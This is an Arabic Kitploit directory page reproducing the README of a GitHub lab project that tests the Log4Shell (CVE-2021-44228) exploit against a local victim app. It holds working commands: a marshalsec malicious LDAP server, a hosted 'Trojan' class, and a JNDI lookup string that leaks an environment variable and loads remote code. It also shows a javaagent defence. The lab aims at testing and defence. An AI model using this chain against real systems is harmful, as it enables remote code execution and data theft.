Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4shell-test-exploit — اختبار استغلال لـ CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/wajda/log4shell-test-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمتطوير الحمولاتمختبرات وتدريب عملي
GitHubwajda/log4shell-test-exploit

log4shell-test-exploit

اختبار استغلال لـ CVE-2021-44228

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

اختبار استغلال ثغرة CVE-2021-44228 (log4shell)

التحضير

root@kitploit:~
# Install Nodejs HTTP server 
npm -g i http-server

# Build victim app
cd victim-app
mvn install

# Compile Trojan
cd test-trojan
javac Trojan.java

# Build marshalsec (required Java 8)
git clone [email protected]:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

# Build log4j-jndi-be-gone
git clone [email protected]:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew

تشغيل خادم HTTP يستضيف حمولة حصان طروادة

root@kitploit:~
cd test-trojan
http-server .

تشغيل خادم LDAP خبيث

انظر https://github.com/mbechler/marshalsec

root@kitploit:~
cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"

مراقبة أحداث الاستغلال (اختياري)

مفيد في الحالات التي يكون فيها stderr مخفيًا

root@kitploit:~
watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'

الاستغلال

الشرح

يقوم تطبيق الضحية بتسجيل السلسلة التالية عبر مكتبة log4j2 المستضعفة (الإصدار 2.14.1)

root@kitploit:~
log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");

منفذًا هجومين في وقت واحد:

  1. التقاط متغيرات البيئة ($USER في هذا المثال)، والتي يمكن عرضها في مخرجات خادم LDAP الخاص بـ marshalsec
root@kitploit:~
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
  1. تنزيل وتنفيذ كود خبيث يسجّل الرسالة !!! BUSTED !!! في تدفق الخطأ القياسي لتطبيق الضحية، بالإضافة إلى إنشاء ملف فارغ /tmp/log4shell-BUSTED-*.
    لكي يعمل هذا الهجوم، يجب تفعيل خيار JVM التالي على الخادم الضحية:
root@kitploit:~
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
التنفيذ
root@kitploit:~
cd victim-app

# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/

الدفاع

انظر: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support

root@kitploit:~
java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

دفاع على مستوى النظام

استبدل جميع الملفات الثنائية java بالسكربت التالي:

java.guarded

root@kitploit:~
#!/bin/bash
$(dirname "$0")/java.original "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"

مثال:

root@kitploit:~
 cd $(dirname $(which java))
 sudo su
 mv java java.original
 cp java.guarded java
تنزيل الأداة